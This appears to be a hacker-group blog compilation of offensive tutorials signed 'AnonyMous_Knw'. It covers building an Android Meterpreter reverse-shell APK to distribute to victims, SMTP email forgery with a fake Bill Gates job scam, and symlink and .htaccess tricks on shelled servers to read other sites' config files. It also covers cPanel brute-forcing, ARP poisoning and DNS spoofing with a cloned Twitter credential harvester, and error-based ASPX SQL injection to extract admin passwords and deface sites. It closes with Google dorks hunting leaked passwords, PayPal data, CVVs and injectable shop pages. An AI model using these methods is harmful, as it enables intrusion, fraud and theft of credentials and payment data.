INDIAN ELITE HACKERS

Hello Readers!

I am back with a new tutorial

Nowadays mobile users are increasing day by
day, the security threat is also increasing
together with the growth of its users. Our
tutorial for today is how to Hacking Android
Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply
because lately android phone growing very
fast worldwide. Here in China you can get
android phone for only US$ 30 it's one of the
reason why android growing fast.

What is  android?

according to wikipedia:

Android is an operating system based on the
Linux kernel, and designed primarily for
touchscreen mobile devices such as
smartphones and tablet computers. Initially
developed by Android, Inc., which Google
backed financially and later bought in 2005,
Android was unveiled in 2007 along with the
founding of the Open Handset Alliance: a
consortium of hardware, software, and
telecommunication companies devoted to
advancing open standards for mobile devices.

and what is APK? according to wikipedia:

Android application package file (APK) is the
file format used to distribute and install
application software and middleware onto
Google's Android operating system; very
similar to an MSI package in Windows or a
Deb package in Debian-based operating
systems like Ubuntu.

Here is some initial information for this
tutorial:

Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:

1. Metasploit framework (we use Kali Linux in this tutorial)
2. Android smartphone (we use HTC One
android 4.4 KitKat)
Step by Step Hacking Android
Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view
tutorial how to create linux keyboard shortcut .
2. We will utilize Metasploit payload
framework to create exploit for this tutorial.

msfpayload android/meterpreter/
reverse_tcp
LHOST=<attacker_ip_address>
LPORT=<port_to_receive_connection>

As described above that attacker IP address is
192.168.8.94.

3. Because our payload is reverse_tcp where
attacker expect the victim to connect back to
attacker machine, attacker needs to set up the
handler to handle incoming connections to the
port already specified above. Type
msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will
use Metasploit handler
set payload android/meterpreter/
reverse_tcp –> make sure the payload

is the same with step 2

4. The next step we need to configure the
switch for the Metasploit payload we already
specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker
IP address
set lport 443 –> port to listen the
reverse connection
exploit –> start to listen incoming
connection

5. Attacker already have the APK's file and
now he will start distribute it (I don't need to
describe how to distribute this file, internet is
the good place for distribution ).

6. Short stories the victim (me myself)
download the malicious APK's file and install
it.

7. It's mean that attacker already inside the
victim android smartphone and he can do
everything with victim phone.

Conclusion:

1. Don't install APK's from the unknown
source.

2. If you really want to install APK's from
unknown source, make sure you can view, read
and examine the source code. The picture
below is the source code of our malicious
APK's in this tutorial.

#AnonyMous_Knw

Hello Readers!!

This time i going to show you how to send fake emails
Fake emails is very easy. We will be connecting to the remote
mail server and using the function of mail
daemon running in the remote host to send
the fake mails.
Anyway, first open the command prompt

(start–> run –> cmd)

and type

o www.mailserver.com 25

This establishes a remote connection to the port number 25 at mailserver.com 

After a successful connection,
I am displayed with the
SMTP infos..

Its always a good idea to ask help from the
mail daemon. So first issue HELP to see the
supported commands..
Then we introduce ourselves to the mail
daemon by issuing the

“HELLO”

command..
and after a successful hello command, we
input the sender email using ‘mail
from:’ (without quotes) command.. Then we
enter the recipient’s address using the ‘rcpt
to:’ (without quotes) command.
Now, we enter our actual data using the DATA
command.. Within DATA, u can use SUBJECT:
command to enter the subject of email..
Finally, we end our data by entering .(full
stop) at the end. This sends the forged mail
through that mail server..
now let me show a session of email forging
from which u can be more clear.
First, I open command prompt & go to telnet
client by typing telnet..

Below is the session:

Microsoft Telnet>o www.mailserver.com 25

220 mailserver.com ESMTP

Sendmail Version
8.x.x; Mon, 28 Sept. 2008;

We do not allow to send fake or bulk emails…
hello microsoft.com
250 mailserver.com Hello Nice to meet you..

mail from:billgates@microsoft.com
250 billgates@microsoft.com Sender Ok
rcpt to:victim@victim.com
250 victim@victim.com Recipient Ok
data
354 Enter mail, end with “.” on a line by
itself..

SUBJECT:Hello!
Hello,
I am Bill Gates, the chairman of Microsoft. I
would like to offer you a job for Microsoft
Corporation. If you are interested to work with
Microsoft, then reply me at my mail address.
Regards~
Bill Gates
.
250 2.0.0 iF3NDLS240106 Message Accepted
For Delivery.
This was the session of sending the forged
mail from billgates@microsoft.com to

victim@mailsite.com

I hope you understood the log.. So this was
my little tutorial on sending forged emails..
The art of sending forged emails can be
extended to send file attachments and to use
multiple recipients..

Any positive or negative comment is heartily
welcomed.. I may extend this file into bigger
form (including esmtp, file attachments,etc.)

Hope you liked my this little basic tutorial on
sending the fake emails..

Extra Tips:

You can find out which ports are opened and
if mail is enabled on any of those ports by
doing an nmap scan of the website. SMTP is a
very commonly open port and could be used
to spoof emails tricking site users to send you
their details or anything else needed.

#AnonyMous_KnW

Hello Readers
Today I am going to show you

BYPASSING SYMLINK METHODS: On LINUX |
APACHE AND LITESPEED SERVERS

Requirements:

Shelled Server
Writable .htaccess

Note :

This tutorial will not work for Godaddy ,
Bluehost , Hostgrator and Hostmonstor
Servers .

Tutorial:

Firstly You Need the Following Files For This
Method:
1 -> AnonyMous KnW CGI Shell
2 -> Anonknw
3 -> passwd-bypass.php
4 -> Turbo Brute force Cpanel
5 -> Port.py
First Before Starting to symlink we need to
create php.ini and ini.php to Disable Safe
mode and Disabled Functions on the server .
Use the Following Code :
Make a php.ini with the following code

safe_mode=Off
And ini.php with
PHP Code:
<?echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "file" ]); ini_restore ("safe_mode" )
;ini_restore ( "open_basedir" );
echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "ss" ]); ?>

Download link of the files used in this method
are on the end of the tutorial .
So after creating php.ini and ini.php upload
the other files to the server .
BYPASSING SYMLINK ON PLESK , DEBIAN ,
CENTOS & REDHAT SERVERS
Now i will explain how to bypass symlink on
Plesk , Debian , Centos and Redhat
Commonly all of the above have root path like

/root/var/www/vhost/

where all sites will be under vhost directory .
But you wont have permission to view it so we
will create a symbolic link to root and view the
site and symlink the config files
Make a new directory in your shell example
sen then upload AnonKnw folder Then
create a
symbolic link to root .

you can manually create a symlink to
root by using the command

ln -s / root

Then You will see this
$ linking: AnonKnw.txt -> /
finishing deferred symbolic links:
.txt -> /
This means a symbolic link has been created
to / root .
Now we need to upload .htaccess use the
following
PHP Code:
Options all
DirectoryIndex Sux.html
AddType text /plain .php
AddHandler server -parsed .php

Done Bypassed Now View

/var/www/vhost/

and you will be displayed with all sites .
BYPASSING SYMLINK ON APACHE AND
LITESPEED:

Mostly when you try to symlink apache
server you will face 403 forbidden or 404
not found and 500 Internel Server Error

These can be Bypass By Using
Different .htaccess individually.
BYPASSING SYMLINK ON APACHE &
LITESPEED – Linux Servers .

First for this make a new directory in your
shell example Anonknw then upload AnonKnW.sa
and .htaccess from the AnonyMous KnW CGI shell
which i added the download link at the end of
the Tutorial

After uploading .htaccess and AnonKnW.sa to a new
directory AnonknW chmod a AnonKnW.sa to 0755
Then Open the Cgi Shell Login
(   Password :-->   anonknw0755   )
Now there are several methods to bypass 403
forbidden You need to try all the following
methods . Atleast one will give you success .
Method 1 : .shtml method
This is the commonly used method by most of
the hackers to bypass 403 forbidden Error .
So before we procced first you need to get
all /etc/passwd from the server so that we
can find the username and path of where the
sites are located .

Server mostly Many functions are

enabled which shows 403 forbidden when you
try to read cat /etc/passwd from the server

so i made a Powerfull Shell which can bypass

and get /etc/passwd from the server.
(I add alredy  at the last of tutorial.)
Upload the /etc/passwd bypasser shell and
get all /etc/passwd
Then Login to AnonyMous CGI Shell and create
a symbolic link to your Target

Step 1 : ln -s / root

Step 2 : ln -s /home/username/public_html/
config.php 1.shtml

Example if our site is http://www.site.com
and username is site and its WordPress

ln -s /home/site/public_html/wp-config.php
1.shtml

So we created a Symbolic link to our Target
now you need to Go to Your Shell and Edit
the .htaccess with the following
PHP Code:
Options + FollowSymlinks
DirectoryIndex itti. html
RemoveHandler . php
AddType application / octet -stream .php

Once you done this Open the 1.shtml on your
Browser and rightclick and view source .
You
will be able to View the Config .
This is the common way of Bypass 403
forbidden and Litespeed .
Now Let Me Explain You the Advanced
Method.

Method 2 : Bypassing Symlinked Config From
Cpanel:

For This You need at least One Cpanel Access
on the sever .

I will tell you how to easily
crack Cpanel .

First Run This Command :

ls /var/mail

Then you will be displayed with all username
from the server Copy all .

Now Upload Turbo Brute Force Cpanel Script
( i attached it at last of Tutorial).

Open the Script and in User Paste all the
username we got

And for Password here is the wordlist Here :

Copy All and Paste it on Password Select
Simple and Click Submit
If Your lucky you will be displayed with
cracked cpanels.
Once you got a cpanel on the server

You can
Bypass 500 Internel Server Error 403
Forbidden Error From Port :2077 and From

error-pages from file manager.
Just symlink the config

ln -s /home/user/public_html/wp-config.php
config.shtml

Login to the cpanel

Then Go to File Manager -> Error Pages

Then Choose any of these according to what
error is triggered when you open your

symlinked config

400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)
Example “&file=400.shtml&desc=(Bad
request)

we can get the config by

“&file=config.shtml& desc=(Bad request)

BYPASS SYMLINK FROM PORT 2077
So once you Symlinked the Config You can
just login to port 2077

Then public_html/path/config.shtml

You will be able download the config.shtml
and you can view the source .

Method 3 : Symlink Bypass via Open Port
using Python
For this First we Python to be Installed on
Server.

To check if Python is installed run this

command python -h

If its install we can use the following python
script and Bypass

#!/usr/bin/env python
# Made in AnonKnw Labs
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__==’__main__':
os.chdir(‘/’)
Handler =
SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((“”, port),
Handler)
print(“Now open this server on webbrowser at
port : ” + str(port))
print(“example: http://site.com :” + str(port))
httpd.serve_forever()

I have added the script to downloads. Now
Upload the script to the shell.
Now run this command :

python port.py

Now Open the site with port 13123

http://www.site.com:13123

Server Bypassed From Open Port .

Method 4 : Bypassing Symlink Using .ini
Method.
Login to AnonyMous KnW CGI shell normally create a
symlink to your target in .ini Extension .

ln -s /home/user/public_html/wp-config.php
config.ini

Now go to the shell and make a new file
a.shtml
Paste the following code inside it and save it

PHP Code:
<!-- #include virtual="config.ini"-->

and save it .
Now open the a.shtml in the browser and
right click and view the source . Done
Bypassed
Method 5 : Bypassing Symlink Using ReadMe
file.
Make a new directory in your shell From the
Cgi shell normally symlink the config

Code:
ln -s /home/user/public_html/config.php
config.txt

now make .htaccess with the following code .

PHP Code:
.htaccess
Options All
ReadMeName config .txt

Now when you open the directory on the
browser you will be displayed with the config
source directly .
eg : site.com/Anonknw/config.txt is your symlinked
config then when you open
http://www.site.com/AnonKnw/ you symlinked
config will be displayed as a ReadMe content .
Thats it i have explain All the Methods to
Bypass Symlink If you will have problem
Bypassing Try all the Following .htaccess

1 – >
PHP Code:
.htaccess
Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php
2 ->
PHP Code:
.htaccess
Options All
DirectoryIndex ssss. html
addType txt . php
AddHandler txt . php< IfModule mod_
security .c >SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>

3 ->
PHP Code:
.htaccess
suPHP_ConfigPath / home/ user/ public_html /
php. ini

4 ->
PHP Code:
.htaccess
Options + FollowSymLinks
DirectoryIndex Sux.html
Options + Indexes
AddType text /plain .php
AddHandler server -parsed .php
AddType text /plain .html

5 -> .htaccess

Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php< IfModule mod_
autoindex .c > IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble</ ifModule>
< IfModule mod_security .c > SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>
.HTACCESS TO BYPASS DISABLED FUNCTIONS

This one is to make python work :
PHP Code:
.htaccess
AddType
application /x -httpd -cgi . py
AddHandler cgi - script . py
AddHandler cgi - script . py

This one is to make perl work :

PHP Code:
.htaccess
AddType application / x- httpd- cgi .pl
AddHandler cgi - script . pl
AddHandler cgi - script . pl

This one is to enable Symlink if the function is
disabled in the server :

PHP Code:
.htaccess< Directory "/home" > *** Options -
ExecCGI * ***AllowOverride
AuthConfig Indexes
Limit FileInfo
Options= IncludesNOEXEC ,Indexes ,Includes ,
MultiViews ,SymLinksIfOwnerMatch ,
FollowSymLinks</ Directory>

This one is to retrieve users permissions :

PHP Code:
.htaccess
AddType text /plain .php
Options + Indexes
DirectoryIndex filename .html

Bypass Internal Server error :

PHP Code:
.htaccess< IfModule mod_security . c>
SecFilterEngine Off SecFilterScanPOST Off </
IfModule>
Change php version:
PHP Code:
.htaccess
AddType application / x- httpd- php4 .php

Bypass Uploads Options and upload shell in
another extension :
PHP Code:
< FilesMatch "^.*.mp3" > SetHandler
application /x -httpd -php </ FilesMatch>

Retrieve Config with picture method :

PHP Code:
.htaccess
Options FollowSymLinks MultiViews Indexes
ExecCGI
AddType application / x- httpd- cgi .gif
AddHandler cgi - script . gif
AddHandler cgi - script . gif

So that’s it i think i had covered everything
thats related to Bypass Symlink and Disabled
Functions on Server .
DOWNLOAD THE SCRIPTS I HAVE USED ON
THE TUTORIAL >>Here<<
Password of zip:- ([[[[[anonknw]]]]])
(Without braces)

Hope U Enjoy Reading

Reagards

AnonyMous Knw

Hello Readers!
In This Tutorial I going To show You

How to Symlink On A Server

What is Symlink ?
Symlink is a method used by hackers to read
files from other users on a linux server, only
by using a php-shell.
So what do we require to start the tutorial :
Requirements :
- a phpshell uploaded in a linux server (Safe
MODE = OFF )
- a target site
- basic phpshell & linux knowledge
- a brain !
Let's start by the tutorial.
Where to get a target, if you only have a
phpshell uploaded in a linux server that has
some sites ?
It's easy , first get the IP of the server.
Then go to bing.com and search like that :
Code:
ip:xx.xxx.xxx.xxx vbulletin
xxx replace with the ip adress of the server ,
and 'vbulletin', you can change to a name of a
forum software or a CMS you wish as a
target. But for this example i'll take vBulletin.
OK , now we got the target site , let's suppose
that its domain name is mytarget.com and it
uses vBulletin forum software.
Now starts the real hacking !
Go to your phpshell , and in the 'Execute
command' field , execute there that
command :
Code:
ls -la /etc/valiases/mytarget.com
By executing this command , i'll get the name
of the user (on the linux server) that keeps
the website mytarget.com.
It should return with a result similar to that :
>>>>>>>-rw-r--r-- 1 target mail 28 May 28
2011 /etc/valiases/mytarget.com
The red colored piece is the user of
mytarget.com on the server.
So in our case the username is 'target '
Many of us know that the configuration file of
vBulletin script ,can be found in /includes/
config.php.
This is the file we need to read in our case ,
in order to get access at our target site.
How can we read that file ?
Simple , execute that command on the shell :
Code:
ln -s /home/target/public_html/includes/
config.php symlink.txt
As you can see, we're writting the content of
config.php , into symlink.txt file.
After you execute the command , you will se a
new file called symlink.txt.
Open it and w00t !! You successfully read the
configuration file (symlinked).
Now , just get an MySQL connector script
coded in PHP , and login with the details you
get from configuration file of your target.Then
at the admin table, get the admin's hash and
crack it , or better , change the admin's email
you yours , and then do a forgot password at
mytarget.com
And then you successfully will get full access
in your target site !
That was all ,very easy if you practice many
times. Maybe soon i will make a video tutorial
if you still didn't understand , just request the
video tut in the comments , and i will try
ASAP to make it for you !

Hope You Enjoyed!

#AnonyMous_Knw

Hello Readers!!!

Now This time I am going to show you

" How to do dns spoofing in Kali Linux Using Ettercap"

Ettercap is a free and open source network
security tool for man-in-the-middle attacks
on LAN. It can be used for computer network
protocol analysis and security auditing. It
runs on various Unix-like operating systems
including Linux, Mac OS X, BSD and Solaris,
and on Microsoft Windows. It is capable of
intercepting traffic on a network segment,
capturing passwords, and conducting active
eavesdropping against a number of common
protocols.

1 - LAUNCH ETTERCAP
Open a root terminal and enter the command
ettercap -G to launch the graphical interface
of ettercap.
Once ettercap is open, select the 'Unified
Sniffing ' option under the 'Sniff ' menu.
Now, select your network interface and then
click 'OK.'
WIFI = wlan0, Ethernet = eth0 | I am using wifi
so I will select wlan0 and click OK.
2 - TARGET HOSTS
Now it is time to target our hosts. To begin
this, select the " Scan for Hosts" option under
the " Hosts" menu, or just press Ctrl + S. It will
scan the hosts on your provided network
interface, and display how many were found in
the Logging box on the bottom. In my case,
4
hosts added to the hosts list...
Now, open the Hosts List by selecting Hosts
List under "Host" menu, or just press H.
Next - Select the default gateway and click
"Add to Target 1." My default gateway is
192.168.1.1 . After that, select the host of the
VICTIM who you are going to perform the
attack on. My victim will be my Galaxy Note 3
(connected to my wifi). This works for any
device on your network. Ok, so the IP address
of my victim host is 192.168.1.14 . I will select
this host and then click "Add to Target 2."

Ok, now select Current Targets under the
Targets menu, or just press "T" on your
keyboard. It will now show you the current
targets. If you followed the last step correctly,
your default gateway will be on one side, and
victim host on the other.
ARP POISONING
First, I am going to show you how to ARP
poison. We do this for all of the other mitm
attacks. Ok, so once you have your targets,
Simply select "Arp poisoning" off of the "Mitm"
menu. Next, select " Sniff remote connections"
and click OK.
Great, now we just need to do one more thing
to start the ARP poisoning. Select "Start
Sniffing" off of the "Sniff" menu, or you can
just use the shortcut: CTRL + W.
Now, you have ARP poisoned the victim! You
will now receive information as they log in to
sites. Example - I am going to log in to
Gmail.com on my phone and Ettercap
will show the login information in the logging
area. Now, as you see in the image below, we
have my username and password to HF :D. It
will sniff all logins.
The second Man in the Middle (Mitm) attack
I'm going to show you is DNS SPOOFING.
Here is the definition of DNS Spoofing, taken
from Wikipedia .
DNS spoofing is a computer hacking attack,
whereby data is introduced into a Domain
Name System name server's cache database,
causing the name server to return an incorrect
IP address, diverting traffic to another
computer.
Basically, DNS spoofing is like this scenario:
Attacker does a dns spoofing attack to replace
http://twitter.com with http://192.168.1.4

(THE ATTACKERS' TWITTER PHISHER). Having
done this, if the victim visits twitter.com, it
will show the ATTACKERS' phisher instead of
real twitter.
Alright, so before we can dns spoof, you need
to configure a file called etter.dns . In Kali
Linux, this file is located in /usr/share/
ettercap/etter.dns. If it is not, no problem -
you can find it the file by running the
following command in terminal:
" locate etter.dns "

Alright, now we will open etter.dns in any type
of text editor. I am just going to use nano, by
entering the following commands:
cd usr/share/ettercap
nano etter.dns
Now, etter.dns will be open in nano terminal
text editor.
Take note that your etter.dns should be full of
text, mine isn't because I have done this
before. Next, delete all of the text in this file.
You can't do ctrl + A in terminal, so it might
be a little faster/easier to open this file in a
editor such as LeafPad, and edit it there.
Alright, now I have etter.dns open in nano
terminal text editor

Ok, so this file tells what we are going to DNS
spoof.

What we will do is enter the following:
twitter.com A 192.168.1.4
This will dns spoof twitter.com to 192.168.1.4
(which is going to be my credential harvester
for twitter).

If you wanted, you could enter multiple lines
like this:
twitter.com A 192.168.1.4
facebook.com A 74.125.225.41
myspace.com A 199.59.149.230
This would dns spoof twitter.com to
192.168.1.4 , facebook.com to
74.125.225.41 (Google), and myspace.com to
199.59.149.230 (Twitter). Or, you could just
put an asterisk which means it will spoof ALL
websites to your desired ip:
* A 192.168.1.4

I am just going to spoof Twitter for this
tutorial, so in etter.dns I am going to delete
everything and just enter twitter.com A
192.168.1.4 . Save the file. If you're using
nano, you can save it by pressing Ctrl + X,
then Y, then press enter.
Great, now etter.dns is ready. I spoofed twitter
to 192.168.1.4 which is going to be my
credential harvester.

To create a credential
harvester, launch the SET framework by
entering the command: se-toolkit . **If you
wish to simply spoof it to an IP other than
your phisher then skip this step :) **
Now, enter 1 for Social-Engineering Attacks.
Secondly, enter 2 for Website Attack Vectors.
Finally, enter 3 for Credential Harvester Attack
Method.
Alright, now enter 2 for site cloner.
Next, enter the YOUR local ip (find it with
ifconfig). mine is 192.168.1.4 , so i'll enter
192.168.1.4 .
Now, it wants you to enter the URL you wish
to clone. I am going to make a fake twitter, so
I enter http://www.twitter.com . Now we are
done with that part.
NOW, it is time to conduct the DNS SPOOFING
attack. Go back to ettercap and make sure you
are NOT ARP POISONING anymore (If you tried
that attack) by clicking "Stop Mitm Attacks"
under the Mitm menu.
Ok, now select "Manage the Plugins" under the
Plugins menu, or just press the shortcut "CTRL
+P"
Last but not least, click Start Sniffing under
the sniff menu, or just press ctrl + W (IF YOU
ARE NOT ALREADY SNIFFING)
Now, I will go to twitter.com on the victim
device, and it would take me to twitter.com -
BUT this is not the real twitter - it's the
attacker's fake twitter! if i were to login, i'd
receive the credentials in the SET window.
Also, you can use "Filters" on Ettercap (this is one of my favorites) , which allow you to
customly filter packets.

#AnonyMous_KnW

Hello all Readers!
Today I
going share a tutorial on How To Install TOR In any
Linux Distro

Ok
First of all copy the bash code below and
save it as Torinstall.sh to Your Desktop.

Code:
#!/bin/shecho "deb http://deb.torproject.org/
torproject.org wheezy main" >> /etc/apt/
sources.list
clear scr
echo"Tor Installer
echo " Installing the keys...."
gpg --keyserver keys.gnupg.net --recv
886DDD89
gpg --export
A3C4F0F979CAA22CDBA8F512EE8CBC9E886
DDD89 | sudo apt-key add -
echo "Ready!!"
clear scr
echo "Updating Repositories...."
apt-get update
clear scr
echo "Installing TOR"
apt-get install deb.torproject.org-keyring
apt-get install tor
echo "Ready!!"
echo "Installing Vidalia"
apt-get install vidalia
echo "Ready!!"
echo "Installing iceweasel-torbutton"
apt-get install iceweasel-torbutton
echo "Ready!!"
clear scr
echo "Installing Privoxy"
apt-get install privoxy
echo "Configuring privoxy"
echo "forward-socks5 / 127.0.0.1:9050 ." >> /
etc/privoxy/config
echo "Ready!!"
service tor restart
service privoxy restart
echo "Tor has been installed successfully."
echo"Enjoy The Anonimity!!!"

Ok Now open the Torinstall.sh with a terminal
and let it install ^_^
after installation open a terminal and type

Code:
/etc/init.d/tor start
/etc/init.d/privoxy start
or
service tor start
service privoxy start

Now goto aplication > internet > Vidalia
Check it says connected to tor network ^_^

Now download the auto proxy addon
download for firefox.
Addon

set the auto proxy to TOR and done.

Enjoy The Anonimity!!

#AnonyMous_Knw

Hello!
This Time I am Posting About ASPX Injection.
Now lets start.

====================================================================================================================

ASPX injection is also similar to PHP based
SQL
injection.But here, we don't use queries that
contain order by, union
select etc. Instead, we will cheat the server to
respond with the
information we needed. It is an error based
injection technique . We will get the
information in the form of errors.
=============================
Step 1:
Find Out A Vulnerable Link
First, we need find out a vulnerable asp/aspx
link which looks like that

www.vulnerablesite.com/gallery.aspx?id=10

=============================
Step 2:
Checking For Vulnerability
As in the PHP based injection, we will test for
the vulnerability by adding a single quote(') at
the end of the URL.
www.vulnerablesite.com/gallery.aspx?id=10'
If it gives an error
then your site is vulnerable to asp/aspx injection.
In asp/aspx based injections, we need not find
out the number of columns
or the most vulnerable column. We will
directly find out the table
names,column names and then we will extract
the data.

=============================
Step 3:
Finding Out The Table Names.

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1 table_name
from information_schema.tables))

The above code executes the second query and
retrieves the first table
name from the database. the windows server
cant convert character
value into data type. so we will get an error from which we can get the first table
name.
But this may not be the desired table for us.
So we need to find out the next table name in
the database.
For that, we will use the following query.

www.vulnerablesite.com/gallery.aspx?id=10
and
1=convert(int,(select top1 table_name from
information_schema.tables
where table_name not in ('first_table_name')))

Replace the first_table_name with the actual
table name we got above.
Now we will get the second table name.
Still if
You don't get our desired table,you will
continue the procedure until you
get the desired table name. Now the query
looks like that

www.vulnerablesite.com/gallery.aspx?id=10
and
1=convert(int,(select top1 table_name from
information_schema.tables
where table_name not in
('first_table_name','second_table_name')))

Replace first_table_name and
second_table_name with the table names we
got in the above steps.

=============================
Step 4:
Finding Out The Columns
Now we got the admin table. So we need to
find out the columns now.

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top1 column_name
from information_schema.columns where
table_name='admin_table'))

Replace admin_table with the table name we
got. In my case, it is "vw_system_admin"

If the first column is not related to our desired
column names, then follow the steps as we
have done in step 3.

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top1 column_name
from
information_schema.columns where
table_name='admin_table' and
column_name not in ('first_column_name')))

Replace first_column_name with the column
name we got.

=============================

Step 5:
Extracting The Data
After finding out all the columns, we need to
extract the data such as user names and
passwords.

For that, we use the following query

For user name:-

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1
admin_username from admin_table))

For password:-

www.vulnerablesite.com/gallery.aspx?id=10
and 1=convert(int,(select top 1
admin_password from admin_table))

Now Find Admin Panel.
& Deface It.

#Anonymous_Knw

intext:Email: Password: IP Address: Paypal: Date 2015: +++++++++++++++++++++++ ext:txt

filetype:txt cvv 2015: +++++++++++++++++++++++ ext:txt

intext:Email: Password: IP Address: Paypal: Date 2015: +++++++++++++++++++++++ ext:txt
-------------------------------------------------------------------
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?id="  intext:"Pay Via Debit Card"

inurl:"addtocart.php?id="

inurl:"shop-cart.php?id="

detail.php?pid=1'

db_ctname

category.php?cid=

powered by koinfo.com

sub.php?db_cid=1'

index.php?obj_id=7215&parent_cat_id=

checkout.asp?UserID=
checkout.asp?cartid=
checkout.cfm?UserID=
checkout.cfm?cartid=
checkout.php?UserID=
checkout.php?cartid=
checkout1.asp?cartid=
checkout1.cfm?cartid=
checkout1.php?cartid=
checkout_confirmed.asp?order_id=
checkout_confirmed.cfm?order_id=
checkout_confirmed.php?order_id=
db/CART/product_details.asp?product_id=
db/CART/product_details.php?product_id=
eshop.php?id=
estore/products.php?cat=
garden_equipment/Fruit-Cage/product.asp?pr=
garden_equipment/Fruit-Cage/product.php?pr=
garden_equipment/pest-weed-control/product.asp?pr=
garden_equipment/pest-weed-control/product.php?pr=
getbook.asp?bookid=
getbook.cfm?bookid=
getbook.php?bookid=
giftDetail.asp?id=
giftDetail.cfm?id=
giftDetail.php?id=
giftshop/product.php?proid=
global/product/product.asp?gubun=
global/product/product.php?gubun=
goods_detail.asp?data=
goods_detail.php?data=
goods_detail.php?goodsIdx=
inurl: prod_detail.php?id=
inurl: prod_detail.php?id=
inurl: prod_info.php?id=
inurl: prod_info.php?id=
inurl: product-item.php?id=
inurl: product-item.php?id=
inurl: product.php?id=
inurl: product.php?id=
inurl: product_ranges_view.php?ID=
inurl: product_ranges_view.php?id=
inurl: productdetail.php?id=
inurl: productdetail.php?id=
inurl: productinfo.php?id=
inurl: productinfo.php?id=
inurl: produit.php?id=
inurl: produit.php?id=
inurl:shop.php?do=part&id=
inurl:shop.php?do=part&id=
inurl:shop_category.php?id=
inurl:shopping.php?id=
inurl:shopping.php?id=
inurl:view_product.php?id=
inurl:view_product.php?id=
irbeautina/product_detail.asp?product_id=
irbeautina/product_detail.php?product_id=
item.asp?eid=
item.asp?id=
item.asp?iid=
item.asp?item_id=
item.asp?itemid=
item.asp?model=
item.asp?prodtype=
item.asp?shopcd=
item.asp?sub_id=
item.cfm?eid=
item.cfm?item_id=
item.cfm?itemid=
item.cfm?model=
item.cfm?prodtype=
item.cfm?shopcd=
item.php?SKU=
item.php?cat=
item.php?code=
item.php?eid=
item.php?id=
item.php?iid=
item.php?item=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item.php?sub_id=
item/detail.php?num=
item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page=
itemDesc.asp?CartId=
itemDesc.cfm?CartId=
itemDesc.php?CartId=
item_book.asp?CAT=
item_book.php?CAT=
item_details.asp?catid=
item_details.cfm?catid=
item_details.php?catid=
item_id=
item_list.asp?cat_id=
item_list.asp?maingroup
item_list.cfm?maingroup
item_list.php?cat_id=
item_list.php?maingroup
item_show.asp?code_no=
item_show.asp?id=
item_show.asp?lid=
item_show.cfm?code_no=
item_show.php?code_no=
item_show.php?id=
item_show.php?itemID=
item_show.php?lid=
itemdetail.asp?item=
itemdetail.cfm?item=
itemdetail.php?item=
itemdetails.asp?catalogid=
itemdetails.cfm?catalogid=
itemdetails.php?catalogid=
itemlist.php?categoryID=
kr/product/product.php?gubun=
kshop/home.php?cat=
kshop/product.asp?productid=
kshop/product.php?productid=
order-now.php?prodid=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
order.asp?lotid=
order.cfm?BookID=
order.cfm?id=
order.cfm?item_ID=
order.php?BookID=
order.php?id=
order.php?item_ID=
order.php?l= order.php?l=
order.php?lang= order.php?lang=
order.php?list= order.php?list=
order.php?ln= order.php?ln=
order.php?p= order.php?p=
order.php?pag= order.php?pag=
order.php?page= order.php?page=
order.php?pg= order.php?pg=
order.php?wp= .php?wp=
order.php?wp= order.php?wp=
order/cart/index.php?maincat_id=
prod.asp?cat=
prod.php?cat=
prod.php?prod= .php?prod="
prodView.asp?idProduct=
prodView.cfm?idProduct=
prodView.php?idProduct=
prod_detail.php?id=
prod_details.php?id=
prod_details.php?products_id=
prod_indiv.php?groupid=
prod_info.php?id=
prod_show.asp?id=
prod_show.asp?prodid=
prodbycat.asp?intCatalogID=
prodbycat.cfm?intCatalogID=
prodbycat.php?intCatalogID=
proddetail.php?prod=
proddetail.php?prod= .php?prod="
proddetails_print.php?prodid=
prodetails.asp?prodid=
prodetails.cfm?prodid=
prodetails.php?prodid=
prodlist.asp?catid=
prodlist.cfm?catid=
prodlist.php?catid=
prodotti.asp?id_cat=
prodotti.php?id_cat=
prodrev.php?cat=
product-detail.php?prodid=
product-details.php?prodID=
product-info.php?cat=
product-item.php?id=
product-list.asp?category_id=
product-list.asp?cid=
product-list.asp?id=
product-list.php?category_id=
product-list.php?cid=
product-list.php?id=
product-range.asp?rangeID=
product-range.php?rangeID=
product.asp?****=
product.asp?ItemID=
product.asp?bid=
product.asp?bookID=
product.asp?cat=
product.asp?id=
product.asp?id_h=
product.asp?intProdID=
product.asp?intProductID=
product.asp?pid=
product.asp?prd=
product.asp?prodid=
product.asp?product=
product.asp?product_id=
product.asp?productid=
product.asp?shopprodid=
product.asp?sku=
product.cfm?bookID=
product.cfm?intProdID=
product.php?****=
product.php?ItemId=
product.php?bid=
product.php?bookID=
product.php?brand=
product.php?c=
product.php?cat=
product.php?cat_id=
product.php?fdProductId=
product.php?id=
product.php?id_h=
product.php?inid=
product.php?intProdID=
product.php?intProductID=
product.php?lang=
product.php?par=
product.php?pcid=
product.php?pid=
product.php?pl=
product.php?prd=
product.php?prod_num=
product.php?prodid=
product.php?product=
product.php?product_id=
product.php?product_no=
